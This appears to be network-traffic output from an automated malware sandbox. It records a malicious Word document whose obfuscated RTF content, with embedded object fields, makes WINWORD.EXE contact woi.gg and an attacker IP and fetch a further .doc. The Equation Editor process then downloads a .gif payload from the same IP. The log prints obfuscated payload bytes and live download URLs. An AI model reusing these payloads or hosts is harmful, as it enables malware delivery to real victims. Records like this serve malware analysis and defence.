\;}{\825505967',[)?88.3+;6.56!%<'>+5\|0?~@?-~!+!6?97-&6%=[`9)?5/:$[[![%?~[;0\|61;13?701+!%7,:25=^/@?5\|.(]\|<2?,0=;7))?%.6!<[_?8^9;;\|?~03_$20.@(<!3%?&.\|]89\|98?/#+?#!$[?21?[:=?!.&&>56[)'4<?&_\|;=/!<!?,?>?`6--3?,_88/??,[1<98#/+?0%\|;]&';]!\|<;0$??1?1?(`~!$9`6871#1\|<%%4[+,^8/`6<]_6+??#/?(1\|$7\|/+^\|^#8`?>2#5;$8?!?(=#)&2.,3`+(?\|-)/?^8-:\|0;!?_4%)#?>>8?5?0`^_!5,?]?@&5.898>??#?/@$??0+#^>~.%'??85^%(9%??&`@$?'8+,.8?2,=(`>+2)%&?$)7,2?)88.]??)0>55\|]80]_~76?7%]:!<9]-\|+3^9)1!,)=?`,,83`]3_0)^!\|>?5;-!=>>:2_-?/$?-?46$.1`,4:4]9)-:~^/\|!7&9!)%'61~4_:9$98989?`;,?$?5!7&%:)#],?~178>:!&7;?$?!<,+3,4~%/%9+?37%'/?;[+7<%;4=?5???>(;9@'=;2@\|:0;=_;\|?74>@/]%7??;!][6<3[+%4;?\|)0@$<[?^5+8\|/!;4[$08??[~6_\|&~=;]&(`?9$_(?-5@(=(_?~~+%=87>?\|:%~^2%+0`#?-0_(8+3@5%~6$~<_0)->?%2`0\|3]4%3!2.*7(96.?[2_1;916`##%,+1'%.$:2/\|5#~-/^%6!<?7#$4<$_-&4(4?^%6??,$%%
Jul 5, 2024 07:16:28.253401995 CEST	224	IN	Data Raw: 7e 3b 21 3d 32 24 34 b0 38 32 27 32 32 26 26 24 37 3d 3a 23 3f a7 60 7c 3f 34 31 33 34 2c 40 3f 3a 3f 5f 23 31 2d 3f 3f 3f 25 3c 36 b5 29 31 2f 38 31 39 31 38 a7 3f 3a 38 29 28 25 60 5f 5b 5f 25 3f 3e b0 24 a7 28 3f 5f 3e b0 60 2d 39 a7 38 7c 25 Data Ascii: ~;!=2$482'22&&$7=:#?`\|?4134,@?:?_#1-???%<6)1/81918?:8)(%`_[_%?>$(?_>`-98\|%?>?~%13&+3__>9!@@;),27`~?,?159@??[2?2'1%\|?$6$?#:`&08>>^*?-%1\|>,7?2=3\|2!4?//10&4]@>%%[:)?^>7?`?[-#-!;_8?%@>3^8?63!1+%#?.,&?<??.1?(+5`
Jul 5, 2024 07:16:28.253412008 CEST	1236	IN	Data Raw: 32 28 3f 3c 2d 21 32 3f 31 3f 28 36 25 5d 2b 30 39 2f 5b 5d 3f 38 7e 33 25 7c 2c 37 60 3f 3e 2b 5d 3f 2d 32 31 2d 5f 24 21 28 34 31 24 27 31 28 40 27 25 2c 30 3f 5b 29 5b 35 2e 25 39 37 3c 32 35 a7 b0 39 26 26 26 30 39 38 3f 3f 27 5d 2b 2d 32 26 Data Ascii: 2(?<-!2?1?(6%]+09/[]?8~3%\|,7`?>+]?-21-_$!(41$'1(@'%,0?[)[5.%97<259&&&098??']+-2&>?:.62>6<1<`8896;#?0^5@,1[?!?[33+2.?`]?:$4[@_/)@381`$_2(?3)/,)>%17/=&3>_\|#5!'=,:>?:?1378_/<`)`8,8&,^1)?73(?2?>]]5?)`__0-=9<7]^?'3!]137.:@/>4269;%/*?6-
Jul 5, 2024 07:16:28.253427982 CEST	1236	IN	Data Raw: 30 b0 a7 39 25 34 5e 3f 3a 21 5e 3f 31 2a 34 40 3b 27 3f 38 2b 2c 3f 34 2a 31 35 b5 32 21 38 3f 3f 24 3f 2b 38 3c 34 28 27 60 3f 3f 25 35 25 3c 34 26 26 30 40 3f 2c 25 37 3f 37 2d 31 a7 3a 2a 5e a7 3f 2d 3d 2c 29 3d 40 2f 3f 39 5b 31 23 21 39 26 Data Ascii: 09%4^?:!^?14@;'?8+,?4152!8??$?+8<4('`??%5%<4&&0@?,%7?7-1:^?-=,)=@/?9[1#!9&[;6-??<,:`?=?+&6@._?:%2?695([![@>[0!~)>[1??-?1+<?^??7?'+0@?:?7,0~58_,;%1??%?@?3@\|>#)3#_:?/~''>0~';[='[!;@>![?@0>,4%?@$1]&72_?:1?>$`7`5#,!.83,/:_
Jul 5, 2024 07:16:28.253441095 CEST	1236	IN	Data Raw: 30 35 25 25 25 3e 2a 29 3f 3f b5 31 2b 3f 37 36 30 25 5d 24 34 28 3f 2c 40 5d 35 37 30 2d 5d 21 23 3c 30 34 37 b0 5e 2b 38 5f 7e 3f 3b 7c 5e 32 29 5d 39 33 23 3f 28 2f 5e 5f 3b 5e 3f 33 2e 5f 3f 3c 23 7c 34 7c 7c 37 b0 b0 38 34 3c 3a 2a 3f 3f 3e Data Ascii: 05%%%>)??1+?760%]$4(?,@]570-]!#<047^+8_~?;\|^2)]93#?(/^_;^?3._?<#\|4\|\|784<:??>-=/9-=3.87;>?0^2^?^?\|'.'(#@00>(!]:5><@?^%^?:)_0?]!8[@&5=>9?4'9:$7`>7>/%2(?!3]$?381;&$=(?.6?*)?,<^<)-4]5!?&~.47$:1?3?~%~8.4[~)06,\|%@?5-[68<3]$\|,?)`/5()'1\|\|+
Jul 5, 2024 07:16:28.253454924 CEST	1236	IN	Data Raw: 3a 37 23 3a 5c 6f 62 6a 65 63 74 38 32 33 35 39 37 34 36 5c 6f 62 6a 61 75 74 6c 69 6e 6b 38 33 35 38 36 33 37 5c 6f 62 6a 77 35 38 30 31 5c 6f 62 6a 68 35 34 31 33 7b 5c 6f 62 6a 75 70 64 61 74 65 32 36 39 37 31 32 32 36 39 37 31 32 5c 2a 5c 6f Data Ascii: :7#:\object82359746\objautlink8358637\objw5801\objh5413{\objupdate269712269712\\objdata7469{\\fname640450473 \bin00\62815945849290057}{\*\liststylename514271612 \bin0000000\463881786101083036}\mmodsolid33254\yts6\'
Jul 5, 2024 07:16:28.253467083 CEST	896	IN	Data Raw: 09 20 09 09 09 09 20 09 09 20 09 20 20 20 09 09 09 20 20 20 09 20 09 09 20 09 09 20 09 20 09 20 09 20 30 30 30 0d 0d 0d 0d 0d 0d 0d 0d 0a 0a 0a 0d 0a 0a 0a 30 30 30 30 09 20 09 09 20 20 20 09 20 09 20 20 09 20 20 09 20 20 20 09 09 09 09 09 20 09 Data Ascii: 0000000 00 0
Jul 5, 2024 07:16:28.253603935 CEST	1236	IN	Data Raw: 09 20 20 09 20 20 09 20 09 09 20 20 09 09 09 20 09 20 09 09 20 09 09 20 09 20 09 20 09 20 32 31 62 30 09 20 09 20 09 09 09 09 09 09 09 09 09 20 20 20 09 20 20 09 20 09 20 09 20 20 20 20 09 20 20 20 09 20 20 20 20 09 09 09 09 09 09 09 20 20 20 20 Data Ascii: 21b0 10 800a0
Jul 5, 2024 07:16:28.253616095 CEST	1236	IN	Data Raw: 09 20 20 09 20 09 09 09 20 09 20 09 09 09 20 20 09 20 09 20 20 09 20 09 09 20 20 09 09 09 20 09 20 09 09 20 09 09 20 09 20 09 20 09 20 63 0a 0d 0d 0a 0d 0d 0d 0d 0d 0d 0d 0a 0a 0a 0a 37 30 0d 0d 0d 0d 0a 0d 0a 0d 0a 0d 0d 0a 0a 0a 0a 30 35 09 09 Data Ascii: c7005 fb02da8f8b3856f
Jul 5, 2024 07:16:28.253628016 CEST	1236	IN	Data Raw: 09 09 09 09 20 20 20 20 20 09 09 20 09 20 09 20 20 20 09 20 09 09 20 09 20 09 20 09 09 20 09 09 09 09 20 09 20 20 20 09 09 09 20 09 20 20 09 20 09 09 20 09 20 09 09 20 20 09 20 20 09 20 20 20 09 20 20 20 20 20 09 09 20 09 20 09 20 09 20 64 09 20 Data Ascii: d 5859b5c
Jul 5, 2024 07:16:28.258408070 CEST	1236	IN	Data Raw: 20 09 20 09 20 20 09 09 09 20 20 09 09 09 20 09 20 09 20 09 20 32 32 0d 0a 0d 0d 0d 0d 0a 0a 0a 0d 0d 0d 0a 0a 0a 64 20 20 09 09 09 09 20 20 09 20 09 20 09 09 09 20 20 20 20 09 09 09 09 20 20 09 20 20 20 09 09 09 09 20 20 20 09 09 09 20 09 20 20 Data Ascii: 22d 3d c7

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.22	49166	172.67.148.197	80	1848	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	Bytes transferred	Direction	Data
Jul 5, 2024 07:16:29.452270985 CEST	847	OUT	OPTIONS / HTTP/1.1 User-Agent: Microsoft Office Protocol Discovery Host: woi.gg Content-Length: 0 Connection: Keep-Alive Cookie: XSRF-TOKEN=eyJpdiI6IlU1Y1AzTG1FT21aZ253akE2VGp6Mnc9PSIsInZhbHVlIjoieWhyZVVqQ3V4aXdCNmxxVUtITDRyc3ZwY1lSNGFjdlZhM09rdmoxU3cyNmVnYU04T3ZGNW1GZzlWbjlwVjJvSXArWnBCcVZ3TzROSUJZcU5jZnlpR3B3eHVYT0xjL3hvWllDay9aS0Z6TEpscDFRaWVnSXgxREJlRk0zbmdhZFciLCJtYWMiOiIzOTE2NThjNTA3ZmRkYzhjMTIzNDQwOWYwMWJjY2YwMTExNWNlMzFhMWQ1ZDUyY2RlZmM5NmUxMmQxYmRkMjZjIiwidGFnIjoiIn0%3D; woi_session=eyJpdiI6Im5jbFJGS3A4NVNJSW45clZpSHVFOXc9PSIsInZhbHVlIjoiNU9nMjhKMUlTK0NDSVhXeWpmaUZLVWdsVE5ucjRENFMxaUxDT0ZKc2lUYzIvWU1pZmlreDg4RVJWMDdaR01pQ21rTE9YM0ptb1o1c1dsdFJyVlVaRlVRM0NYOWIxQWFxYTlvVGRPVEZkT1liREhBUFoyeG80d1dMRGRLMzRBWjgiLCJtYWMiOiIwZmQxMzk0MTY1YmIyNzk3NTFiNmNlODk5YmM2NjJkZWE5NWJlZjUwNjJjN2IwNzRlYTJiMDc0MjUwNjM0MGYyIiwidGFnIjoiIn0%3D
Jul 5, 2024 07:16:29.945837975 CEST	799	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 05 Jul 2024 05:16:29 GMT Content-Type: text/html Content-Length: 167 Connection: keep-alive Cache-Control: max-age=3600 Expires: Fri, 05 Jul 2024 06:16:29 GMT Location: https://woi.gg/ Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bvU5wz6D1OuLvekMBN%2BlgNkzC9A7Lu6HCGY5kwJuEFUiJHoMfLkU55UIoqyDZgG%2BI3yP4RSOjA3qJBYrsX5WICkNMK%2Fr7MrSDSWcqxLUT9w%2FltU9i9CnoeI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89e4e21ec897424f-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
Jul 5, 2024 07:16:30.223978043 CEST	847	OUT	OPTIONS / HTTP/1.1 User-Agent: Microsoft Office Protocol Discovery Host: woi.gg Content-Length: 0 Connection: Keep-Alive Cookie: XSRF-TOKEN=eyJpdiI6IlU1Y1AzTG1FT21aZ253akE2VGp6Mnc9PSIsInZhbHVlIjoieWhyZVVqQ3V4aXdCNmxxVUtITDRyc3ZwY1lSNGFjdlZhM09rdmoxU3cyNmVnYU04T3ZGNW1GZzlWbjlwVjJvSXArWnBCcVZ3TzROSUJZcU5jZnlpR3B3eHVYT0xjL3hvWllDay9aS0Z6TEpscDFRaWVnSXgxREJlRk0zbmdhZFciLCJtYWMiOiIzOTE2NThjNTA3ZmRkYzhjMTIzNDQwOWYwMWJjY2YwMTExNWNlMzFhMWQ1ZDUyY2RlZmM5NmUxMmQxYmRkMjZjIiwidGFnIjoiIn0%3D; woi_session=eyJpdiI6Im5jbFJGS3A4NVNJSW45clZpSHVFOXc9PSIsInZhbHVlIjoiNU9nMjhKMUlTK0NDSVhXeWpmaUZLVWdsVE5ucjRENFMxaUxDT0ZKc2lUYzIvWU1pZmlreDg4RVJWMDdaR01pQ21rTE9YM0ptb1o1c1dsdFJyVlVaRlVRM0NYOWIxQWFxYTlvVGRPVEZkT1liREhBUFoyeG80d1dMRGRLMzRBWjgiLCJtYWMiOiIwZmQxMzk0MTY1YmIyNzk3NTFiNmNlODk5YmM2NjJkZWE5NWJlZjUwNjJjN2IwNzRlYTJiMDc0MjUwNjM0MGYyIiwidGFnIjoiIn0%3D
Jul 5, 2024 07:16:30.329176903 CEST	797	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 05 Jul 2024 05:16:30 GMT Content-Type: text/html Content-Length: 167 Connection: keep-alive Cache-Control: max-age=3600 Expires: Fri, 05 Jul 2024 06:16:30 GMT Location: https://woi.gg/ Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7yZpRu%2BFsvhXZFaefoQx1HWByJA8q6e8vNxkuFSob4z0TPL0uo%2FM2yu9%2BUHKIS8wDmPfduVRk1bOaT5Kd3cL8RxRAuDN4HBMA7uLC4HlaUmO10m6J8ZQ4us%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89e4e2213a46424f-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
Jul 5, 2024 07:16:30.341175079 CEST	847	OUT	OPTIONS / HTTP/1.1 User-Agent: Microsoft Office Protocol Discovery Host: woi.gg Content-Length: 0 Connection: Keep-Alive Cookie: XSRF-TOKEN=eyJpdiI6IlU1Y1AzTG1FT21aZ253akE2VGp6Mnc9PSIsInZhbHVlIjoieWhyZVVqQ3V4aXdCNmxxVUtITDRyc3ZwY1lSNGFjdlZhM09rdmoxU3cyNmVnYU04T3ZGNW1GZzlWbjlwVjJvSXArWnBCcVZ3TzROSUJZcU5jZnlpR3B3eHVYT0xjL3hvWllDay9aS0Z6TEpscDFRaWVnSXgxREJlRk0zbmdhZFciLCJtYWMiOiIzOTE2NThjNTA3ZmRkYzhjMTIzNDQwOWYwMWJjY2YwMTExNWNlMzFhMWQ1ZDUyY2RlZmM5NmUxMmQxYmRkMjZjIiwidGFnIjoiIn0%3D; woi_session=eyJpdiI6Im5jbFJGS3A4NVNJSW45clZpSHVFOXc9PSIsInZhbHVlIjoiNU9nMjhKMUlTK0NDSVhXeWpmaUZLVWdsVE5ucjRENFMxaUxDT0ZKc2lUYzIvWU1pZmlreDg4RVJWMDdaR01pQ21rTE9YM0ptb1o1c1dsdFJyVlVaRlVRM0NYOWIxQWFxYTlvVGRPVEZkT1liREhBUFoyeG80d1dMRGRLMzRBWjgiLCJtYWMiOiIwZmQxMzk0MTY1YmIyNzk3NTFiNmNlODk5YmM2NjJkZWE5NWJlZjUwNjJjN2IwNzRlYTJiMDc0MjUwNjM0MGYyIiwidGFnIjoiIn0%3D
Jul 5, 2024 07:16:30.450175047 CEST	795	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 05 Jul 2024 05:16:30 GMT Content-Type: text/html Content-Length: 167 Connection: keep-alive Cache-Control: max-age=3600 Expires: Fri, 05 Jul 2024 06:16:30 GMT Location: https://woi.gg/ Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hQxbxXyXMs6fWcZWk0J2LPuQMlZQF1nfHrNq12QTMUvRsjLVot8EJHIfIpnWR84AC6ODjl784KbgILUHT3iQdJ1OaRpbE%2FfFCnA%2Fm73WhJxlCBZwWcZcjVQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89e4e221ead4424f-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
Jul 5, 2024 07:16:37.994018078 CEST	851	OUT	HEAD /1RxrR6 HTTP/1.1 User-Agent: Microsoft Office Existence Discovery Host: woi.gg Content-Length: 0 Connection: Keep-Alive Cookie: XSRF-TOKEN=eyJpdiI6IlU1Y1AzTG1FT21aZ253akE2VGp6Mnc9PSIsInZhbHVlIjoieWhyZVVqQ3V4aXdCNmxxVUtITDRyc3ZwY1lSNGFjdlZhM09rdmoxU3cyNmVnYU04T3ZGNW1GZzlWbjlwVjJvSXArWnBCcVZ3TzROSUJZcU5jZnlpR3B3eHVYT0xjL3hvWllDay9aS0Z6TEpscDFRaWVnSXgxREJlRk0zbmdhZFciLCJtYWMiOiIzOTE2NThjNTA3ZmRkYzhjMTIzNDQwOWYwMWJjY2YwMTExNWNlMzFhMWQ1ZDUyY2RlZmM5NmUxMmQxYmRkMjZjIiwidGFnIjoiIn0%3D; woi_session=eyJpdiI6Im5jbFJGS3A4NVNJSW45clZpSHVFOXc9PSIsInZhbHVlIjoiNU9nMjhKMUlTK0NDSVhXeWpmaUZLVWdsVE5ucjRENFMxaUxDT0ZKc2lUYzIvWU1pZmlreDg4RVJWMDdaR01pQ21rTE9YM0ptb1o1c1dsdFJyVlVaRlVRM0NYOWIxQWFxYTlvVGRPVEZkT1liREhBUFoyeG80d1dMRGRLMzRBWjgiLCJtYWMiOiIwZmQxMzk0MTY1YmIyNzk3NTFiNmNlODk5YmM2NjJkZWE5NWJlZjUwNjJjN2IwNzRlYTJiMDc0MjUwNjM0MGYyIiwidGFnIjoiIn0%3D
Jul 5, 2024 07:16:38.108664036 CEST	634	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 05 Jul 2024 05:16:38 GMT Content-Type: text/html Content-Length: 167 Connection: keep-alive Cache-Control: max-age=3600 Expires: Fri, 05 Jul 2024 06:16:38 GMT Location: https://woi.gg/1RxrR6 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wa3LYGm8ljNhaGF5fPR8BprJnEZyTKXKqcBQyrSrI21c1cRiNXyMeOV%2Fw0DtAf8I6%2FqXrjgqY8GNI3RN4ZPmriOm7Ci14IHEdm5VtTsvAbPK4Df4mZCHvPE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89e4e251cf68424f-EWR alt-svc: h3=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.22	49167	172.67.148.197	80	1848	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	Bytes transferred	Direction	Data
Jul 5, 2024 07:16:30.672946930 CEST	832	OUT	HEAD /1RxrR6 HTTP/1.1 Connection: Keep-Alive Cookie: XSRF-TOKEN=eyJpdiI6IlU1Y1AzTG1FT21aZ253akE2VGp6Mnc9PSIsInZhbHVlIjoieWhyZVVqQ3V4aXdCNmxxVUtITDRyc3ZwY1lSNGFjdlZhM09rdmoxU3cyNmVnYU04T3ZGNW1GZzlWbjlwVjJvSXArWnBCcVZ3TzROSUJZcU5jZnlpR3B3eHVYT0xjL3hvWllDay9aS0Z6TEpscDFRaWVnSXgxREJlRk0zbmdhZFciLCJtYWMiOiIzOTE2NThjNTA3ZmRkYzhjMTIzNDQwOWYwMWJjY2YwMTExNWNlMzFhMWQ1ZDUyY2RlZmM5NmUxMmQxYmRkMjZjIiwidGFnIjoiIn0%3D; woi_session=eyJpdiI6Im5jbFJGS3A4NVNJSW45clZpSHVFOXc9PSIsInZhbHVlIjoiNU9nMjhKMUlTK0NDSVhXeWpmaUZLVWdsVE5ucjRENFMxaUxDT0ZKc2lUYzIvWU1pZmlreDg4RVJWMDdaR01pQ21rTE9YM0ptb1o1c1dsdFJyVlVaRlVRM0NYOWIxQWFxYTlvVGRPVEZkT1liREhBUFoyeG80d1dMRGRLMzRBWjgiLCJtYWMiOiIwZmQxMzk0MTY1YmIyNzk3NTFiNmNlODk5YmM2NjJkZWE5NWJlZjUwNjJjN2IwNzRlYTJiMDc0MjUwNjM0MGYyIiwidGFnIjoiIn0%3D User-Agent: Microsoft Office Existence Discovery Host: woi.gg
Jul 5, 2024 07:16:31.166044950 CEST	642	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 05 Jul 2024 05:16:31 GMT Content-Type: text/html Content-Length: 167 Connection: keep-alive Cache-Control: max-age=3600 Expires: Fri, 05 Jul 2024 06:16:31 GMT Location: https://woi.gg/1RxrR6 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gAetwqpKr8PZ%2B%2B3CSmL8vc2cjGhvVKXsiP6v8b3RpS0%2BZDSyA2qaG1vIKd48O4yeZUzxScSMTvhknqb%2Fs%2FE%2BzYWUQIx2nRot67xsXSBnfEMnCe1jqPgZleo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89e4e2265fb88c93-EWR alt-svc: h3=":443"; ma=86400
Jul 5, 2024 07:16:31.375072002 CEST	642	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 05 Jul 2024 05:16:31 GMT Content-Type: text/html Content-Length: 167 Connection: keep-alive Cache-Control: max-age=3600 Expires: Fri, 05 Jul 2024 06:16:31 GMT Location: https://woi.gg/1RxrR6 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gAetwqpKr8PZ%2B%2B3CSmL8vc2cjGhvVKXsiP6v8b3RpS0%2BZDSyA2qaG1vIKd48O4yeZUzxScSMTvhknqb%2Fs%2FE%2BzYWUQIx2nRot67xsXSBnfEMnCe1jqPgZleo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89e4e2265fb88c93-EWR alt-svc: h3=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port
4	192.168.2.22	49169	172.67.148.197	80

Timestamp	Bytes transferred	Direction	Data
Jul 5, 2024 07:16:36.041512012 CEST	842	OUT	OPTIONS / HTTP/1.1 Connection: Keep-Alive Cookie: XSRF-TOKEN=eyJpdiI6IlU1Y1AzTG1FT21aZ253akE2VGp6Mnc9PSIsInZhbHVlIjoieWhyZVVqQ3V4aXdCNmxxVUtITDRyc3ZwY1lSNGFjdlZhM09rdmoxU3cyNmVnYU04T3ZGNW1GZzlWbjlwVjJvSXArWnBCcVZ3TzROSUJZcU5jZnlpR3B3eHVYT0xjL3hvWllDay9aS0Z6TEpscDFRaWVnSXgxREJlRk0zbmdhZFciLCJtYWMiOiIzOTE2NThjNTA3ZmRkYzhjMTIzNDQwOWYwMWJjY2YwMTExNWNlMzFhMWQ1ZDUyY2RlZmM5NmUxMmQxYmRkMjZjIiwidGFnIjoiIn0%3D; woi_session=eyJpdiI6Im5jbFJGS3A4NVNJSW45clZpSHVFOXc9PSIsInZhbHVlIjoiNU9nMjhKMUlTK0NDSVhXeWpmaUZLVWdsVE5ucjRENFMxaUxDT0ZKc2lUYzIvWU1pZmlreDg4RVJWMDdaR01pQ21rTE9YM0ptb1o1c1dsdFJyVlVaRlVRM0NYOWIxQWFxYTlvVGRPVEZkT1liREhBUFoyeG80d1dMRGRLMzRBWjgiLCJtYWMiOiIwZmQxMzk0MTY1YmIyNzk3NTFiNmNlODk5YmM2NjJkZWE5NWJlZjUwNjJjN2IwNzRlYTJiMDc0MjUwNjM0MGYyIiwidGFnIjoiIn0%3D User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601 translate: f Host: woi.gg
Jul 5, 2024 07:16:36.519057035 CEST	805	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 05 Jul 2024 05:16:36 GMT Content-Type: text/html Content-Length: 167 Connection: keep-alive Cache-Control: max-age=3600 Expires: Fri, 05 Jul 2024 06:16:36 GMT Location: https://woi.gg/ Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CY%2B0K0Vho23JEHB%2FnErh6ZyJKq6jh%2BcHUu7WpzAROGKJn4vqOZywcTq%2FkClwY743AvfMKFW0VnNVpeF2PYf0iKNqNISvVTHY%2FYA9bTC85%2BmYxvn%2FSmDFKsQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89e4e247df6943c4-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.22	49172	172.232.56.138	80	1848	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	Bytes transferred	Direction	Data
Jul 5, 2024 07:16:39.478394032 CEST	158	OUT	HEAD /xampp/hu/hu.hu.huhuh.doc HTTP/1.1 User-Agent: Microsoft Office Existence Discovery Content-Length: 0 Connection: Keep-Alive Host: 172.232.56.138
Jul 5, 2024 07:16:40.130676985 CEST	322	IN	HTTP/1.1 200 OK Date: Fri, 05 Jul 2024 05:16:40 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Thu, 04 Jul 2024 07:44:35 GMT ETag: "1478b-61c671e4a808e" Accept-Ranges: bytes Content-Length: 83851 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/msword

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.22	49173	172.232.56.138	80	2544	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	Bytes transferred	Direction	Data
Jul 5, 2024 07:16:40.402416945 CEST	335	OUT	GET /99032/goodflowersandgoodreturn.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 172.232.56.138 Connection: Keep-Alive
